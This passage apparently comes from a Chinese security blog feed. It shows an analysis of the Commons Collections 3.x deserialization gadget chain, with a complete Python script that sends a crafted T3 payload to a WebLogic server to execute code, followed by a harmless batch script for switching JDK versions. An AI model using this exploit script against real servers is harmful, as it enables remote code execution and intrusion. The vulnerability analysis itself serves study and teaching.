49.2-86.2c0 0 0 0 0 0c5.2-7.1 10.4-14.2 15.4-21.4c19.8-28.5 31.4-63 31.4-100.3C368 78.8 289.2 0 192 0S16 78.8 16 176c0 37.3 11.6 71.9 31.4 100.3c5 7.2 10.2 14.3 15.4 21.4c0 0 0 0 0 0c19.8 27.1 39.7 54.4 49.2 86.2l160 0zM192 512c44.2 0 80-35.8 80-80l0-16-160 0 0 16c0 44.2 35.8 80 80 80zM112 176c0 8.8-7.2 16-16 16s-16-7.2-16-16c0-61.9 50.1-112 112-112c8.8 0 16 7.2 16 16s-7.2 16-16 16c-44.2 0-80 35.8-80 80z"/></svg> <span>Tip</span> </div> <div class="admonition-content"> <ol> <li>是一个类对象</li> <li>该类是一个注解类</li> <li>该类至少存在一个方法(记作 <code>methodData</code>)</li> </ol> </div> </div> <p>然后我们控制参数 <code>memberValues</code>，让它满足</p> <p>存在一个键值对，其 <code>key</code> 等于 <code>methodData</code></p> <p>我们找到了 <code>Retention</code> 类，它是一个注解类，有一个方法叫做 <code>value</code></p> <p><img src="https://www.fufu.me/apache-cc3.x/images/202506081849851.png" width="1555" height="960" srcset="https://www.fufu.me/apache-cc3.x/images/202506081849851_hu16286542624916821193.png 480w, https://www.fufu.me/apache-cc3.x/images/202506081849851_hu3509096532262957718.png 1024w" loading="lazy" alt="image_65" class="gallery-image" data-flex-grow="161" data-flex-basis="388px" ></p> <p>符合要求的类还有很多，比如 <code>Repeatable</code>、<code>Target</code> 等等。</p> <h2 id="t3协议发送payload弹计算器">t3协议发送payload弹计算器 </h2><pre><code class="language-python">#!/usr/bin/python3 import socket import sys import struct sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (sys.argv[1], int(sys.argv[2])) print('connecting to %s port %s' % server_address) sock.connect(server_address) # Send headers headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' print('sending &quot;%s&quot;' % headers) sock.sendall(headers.encode()) data = sock.recv(1024) print('received &quot;%s&quot;' % data.decode(), file=sys.stderr) payloadObj = open(sys.argv[3], 'rb').read() payload = b'\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' payload = payload + payloadObj payload = payload + b'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' # adjust header for appropriate message length payload = struct.pack('!i', len(payload)) + payload[4:] print('sending payload...') sock.send(payload) </code></pre> <p>执行命令</p> <pre><code class="language-shell">python weblogic-t3-p3.py &lt;ip&gt; &lt;port&gt; &lt;payloadFile&gt; </code></pre> <p><img src="https://www.fufu.me/apache-cc3.x/images/20250607120340315.png" width="2034" height="1082" srcset="https://www.fufu.me/apache-cc3.x/images/20250607120340315_hu12548052784515821034.png 480w, https://www.fufu.me/apache-cc3.x/images/20250607120340315_hu12161470581768607694.png 1024w" loading="lazy" alt="image-20250607120340037" class="gallery-image" data-flex-grow="187" data-flex-basis="451px" ></p> <h2 id="调试分析验证">调试分析验证 </h2><p>在 <code>AnnotationInvocationHandler</code> 类中 <code>readObject()</code> 方法下断点调试。</p> <p><strong>调用链</strong></p> <pre><code class="language-java">Gadget chain: ObjectInputStream.readObject() └── AnnotationInvocationHandler.readObject() └── AbstractInputCheckedMapDecorator$MapEntry.setValue() └── TransformedMap.checkSetValue() └── ChainedTransformer.transform() ├── ConstantTransformer.transform() ├── InvokerTransformer.transform() └── Method.invoke() → Class.getMethod() ├── InvokerTransformer.transform() └── Method.invoke() → Runtime.getRuntime() └── InvokerTransformer.transform() └── Method.invoke() → Runtime.exec() Requires: commons-collections &lt;= 3.2.1 </code></pre> <h3 id="readobject走到setvalue">readObject()走到setValue() </h3><p>下面是之前谈到的 <code>readObject()</code> 方法反编译的代码，我们用这个再进行一次分析</p> <pre><code class="language-java">private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException { var1.defaultReadObject(); AnnotationType var2 = null; try { var2 = AnnotationType.getInstance(this.type); } catch (IllegalArgumentException var9) { throw new InvalidObjectException(&quot;Non-annotation type in annotation serial stream&quot;); } Map var3 = var2.memberTypes(); Iterator var4 = this.memberValues.entrySet().iterator(); while(var4.hasNext()) { Map.Entry var5 = (Map.Entry)var4.next(); String var6 = (String)var5.getKey(); Class var7 = (Class)var3.get(var6); if (var7 != null) { Object var8 = var5.getValue(); if (!var7.isInstance(var8) &amp;&amp; !(var8 instanceof ExceptionProxy)) { var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + &quot;[&quot; + var8 + &quot;]&quot;)).setMember((Method)var2.members().get(var6))); } } } } </code></pre> <p>核心函数是Map对象var5触发setValue(),为了能走到这个分支需要条件1和2</p> <ol> <li><code>var7 != null</code></li> <li><code>!var7.isInstance(var8) &amp;&amp; !(var8 instanceof ExceptionProxy)</code></li> </ol> <p>var7需要是个类，并且和var8的类型不相同。 var7通过var3获取到值，具体获取什么的key由 <code>var5(var4)</code> 的Map对象决定的，可以通过类初始化传入(可控)。 var8是通过可控 <code>var5(var4)</code> 的Map对象值决定的，条件2容易过故不展开研究。 现在 <code>var3.get(var6)</code> key我们可控，现在需要Map类型var3，它是由 <code>AnnotationType.getInstance(this.type)</code> 类型传入的也是类初始化传入(可控)，<code>AnnotationType</code> 对@Target这个注解的处理，getInstance会获取到@Target的基本信息，找一个有Target注解的类即可，PoC找的就是<code>java.lang.annotation.Retention</code>，到这条件1也达成了。</p> <h3 id="走到transform">走到transform() </h3><p>TransformedMap类继承了 <code>AbstractInputCheckedMapDecorator</code>，存在 <code>setValue()</code> 方法</p> <pre><code class="language-java">public Object setValue(Object value) { value = this.parent.checkSetValue(value); return super.entry.setValue(value); } </code></pre> <p>最后通过TransformedMap的checkSetValue()到了我们想要的transform()方法</p> <pre><code class="language-java">protected Object checkSetValue(Object value) { return this.valueTransformer.transform(value); } </code></pre> <h3 id="transform到rce">transform()到RCE </h3><p>利用链成立，分析正确。</p> <h2 id="jdk18为什么不行">jdk1.8为什么不行 </h2><p>其实上面的poc在Java 7的低版本(只测试了7u80，没有具体版本号)、8u71之前都是可以使用的，在Java 8u71之后代码发生了变动。</p> <p>那么为什么不行呢，看一下jdk8里面的<code>sun.reflect.annotation.AnnotationInvocationHandler</code> readObject复写点</p> <pre><code class="language-java">private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException { GetField var2 = var1.readFields(); Class var3 = (Class)var2.get(&quot;type&quot;, (Object)null); Map var4 = (Map)var2.get(&quot;memberValues&quot;, (Object)null); AnnotationType var5 = null; try { var5 = AnnotationType.getInstance(var3); } catch (IllegalArgumentException var13) { throw new InvalidObjectException(&quot;Non-annotation type in annotation serial stream&quot;); } Map var6 = var5.memberTypes(); LinkedHashMap var7 = new LinkedHashMap(); String var10; Object var11; for(Iterator var8 = var4.entrySet().iterator(); var8.hasNext(); var7.put(var10, var11)) { Entry var9 = (Entry)var8.next(); var10 = (String)var9.getKey(); var11 = null; Class var12 = (Class)var6.get(var10); if (var12 != null) { var11 = var9.getValue(); if (!var12.isInstance(var11) &amp;&amp; !(var11 instanceof ExceptionProxy)) { //没有了map赋值语句，伤心 var11 = (new AnnotationTypeMismatchExceptionProxy(var11.getClass() + &quot;[&quot; + var11 + &quot;]&quot;)).setMember((Method)var5.members().get(var10)); } } } ... } </code></pre> <p>因为这个函数出现了变动，不再有针对我们构造的map的赋值语句，所以触发不了漏洞。</p> <p>而是改成了新建一个LinkedHashMap，把值转到这个LinkedHashMap里。</p> https://www.fufu.me/javaverchange/ Sat, 25 Jan 2025 19:22:36 +0800 https://www.fufu.me/javaverchange/ <img src="https://www.fufu.me/img/java-logo.png" alt="Featured image of post JAVA版本切换脚本" /><p>经常使用java的朋友可以发现，我们需要在一台电脑上部署多种版本的java来运行不同的程序。但是java版本之间的切换很麻烦，要手动更改环境变量的值，所以我写了以下脚本来简化这一过程。</p> <blockquote> <p>环境变量的形式是键值对，当值是目录时，在cmd中输入单词时会到path变量的目录下寻找这个词的可执行文件。</p> </blockquote> <pre><code class="language-bat">@echo off ::Get Administrator Privileges %1 mshta vbscript:CreateObject(&quot;Shell.Application&quot;).ShellExecute(&quot;cmd.exe&quot;,&quot;/c %~s0 ::&quot;,&quot;&quot;,&quot;runas&quot;,1)(window.close)&amp;&amp;exit cd /d &quot;%~dp0&quot; ::Setting Window Size mode con cols=120 lines=60 title JDK-Version change script of Bat :menu echo current jdk version: java -version echo. echo ============================================= echo ################ JDK version-list ################ echo. echo [0] cancel switch echo [8] switch to JDK8 echo [17] switch to JDK17 echo [22] switch to JDK22 echo. echo ============================================= echo. set /P vb=Please choose need switch JDK versions: if &quot;%vb%&quot; EQU &quot;8&quot; ( setx &quot;JAVA_HOME&quot; &quot;C:\Program Files\Java\jdk-1.8&quot; /m echo Tips: Successfully switched JDK version, &quot;JAVA_HOME&quot; has been modified C:\Program Files\Java\jdk-1.8. pause echo. ) else if &quot;%vb%&quot; EQU &quot;17&quot; ( setx &quot;JAVA_HOME&quot; &quot;C:\Program Files\Java\jdk-17&quot; /m echo Tips: Successfully switched JDK version, &quot;JAVA_HOME&quot; has been modified C:\Program Files\Java\jdk-17. pause echo. ) else if &quot;%vb%&quot; EQU &quot;22&quot; ( setx &quot;JAVA_HOME&quot; &quot;C:\Program Files\Java\jdk-22&quot; /m echo Tips: Successfully switched JDK version, &quot;JAVA_HOME&quot; has been modified C:\Program Files\Java\jdk-22. pause echo. ) else if &quot;%vb%&quot; EQU &quot;0&quot; ( goto exit ) else ( echo. echo ! choosing version error, please renew choice ... echo. goto menu pause ) echo Please press any key to exit.. &amp; pause &gt; nul :exit </code></pre> <h2 id="脚本本地化">脚本本地化 </h2><p>java的目录结构如下所示，我自己创建了scripts目录，然后把脚本放到了里面，脚本的名字叫jchan.bat</p> <p><img src="https://www.fufu.me/javaverchange/images/jcbfbfdihr.png" width="886" height="192" srcset="https://www.fufu.me/javaverchange/images/jcbfbfdihr_hu1343971766474637503.png 480w, https://www.fufu.me/javaverchange/images/jcbfbfdihr_hu6374686705726725311.png 1024w" loading="lazy" alt="jcbfbfdihr" class="gallery-image" data-flex-grow="461" data-flex-basis="1107px" ></p> <p>如果路径不同请修改脚本中的语句</p> <pre><code class="language-bat">if &quot;%vb%&quot; EQU &quot;8&quot; ( setx &quot;JAVA_HOME&quot; &quot;C:\Program Files\Java\jdk-1.8&quot; /m echo Tips: Successfully switched JDK version, &quot;JAVA_HOME&quot; has been modified C:\Program Files\Java\jdk-1.8. </code></pre> <p>1.其中第一行<strong>EQU 8</strong>代表输入的数字选项，按照自己的版本情况自行修改。</p> <p>2.第二行setx &ldquo;JAVA_HOME&rdquo; &ldquo;C:\Program Files\Java\jdk-1.8&rdquo; /m中<strong>C:\Program Files\Java\jdk-1.8</strong>表示要写入环境变量键<strong>JAVA_HOME</strong>的值，所以后面的值要更改成自己java的路径(重要)。</p> <p>3.第三行是输出提示，仍然是更改路径即可。</p> <h2 id="环境变量配置">环境变量配置 </h2><p>使用前应该保证在环境变量里添加了如下配置</p> <p><img src="https://www.fufu.me/javaverchange/images/hrjybmldpzvi.png" width="840" height="430" srcset="https://www.fufu.me/javaverchange/images/hrjybmldpzvi_hu14842711936301359023.png 480w, https://www.fufu.me/javaverchange/images/hrjybmldpzvi_hu14931228372940344273.png 1024w" loading="lazy" alt="hrjybmldpzvi" class="gallery-image" data-flex-grow="195" data-flex-basis="468px" ></p> <p><strong>JAVA_HOME</strong>的值随意，因为在之后切换的过程中会被脚本自己更改，所以只要做好<strong>脚本本地化中的第二步即可</strong>。</p> <p>classpath按图示配置</p> <pre><code class="language-powershell">.;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar </code></pre> <h2 id="path中添加java的环境变量">path中添加java的环境变量 </h2><p>按图示填入值，注意一定要删除红色框中的值，这是java自己生成的path，会影响版本的切换！</p> <p>黑色框的值自己填入，注意第二行，要填自己电脑scripts文件夹的路径。</p> <pre><code class="language-powershell">%JAVA_HOME%\bin C:\Program Files\Java\scripts </code></pre> <p><img src="https://www.fufu.me/javaverchange/images/javahrjybmld.png" width="677" height="663" srcset="https://www.fufu.me/javaverchange/images/javahrjybmld_hu13097542337124427959.png 480w, https://www.fufu.me/javaverchange/images/javahrjybmld_hu15380945036405222247.png 1024w" loading="lazy" alt="javahrjybmld" class="gallery-image" data-flex-grow="102" data-flex-basis="245px" ></p> <p>配置完毕后，你就可以使用了。</p> <p>方法：Win+R-&gt;键入cmd-&gt;jchan(因为前面把脚本命名为了jchan.bat)-&gt;按脚本提示更改版本。</p> <h2 id="文件下载地址jchanbathttpscloudnichttopsp7ua">文件下载地址：<a class="link" href="https://cloud.nicht.top/s/P7ua" target="_blank" rel="noopener" >📄jchan.bat <span style="white-space: nowrap;"><svg width=".7em" height=".7em" viewBox="0 0 21 21" xmlns="http://www.w3.org/2000/svg"> <path d="m13 3l3.293 3.293l-7 7l1.414 1.414l7-7L21 11V3z" fill="currentColor" /> <path d="M19 19H5V5h7l-2-2H5c-1.103 0-2 .897-2 2v14c0 1.103.897 2 2 2h14c1.103 0 2-.897 2-2v-5l-2-2v7z" fill="currentColor"> </svg></span> </a> </h2>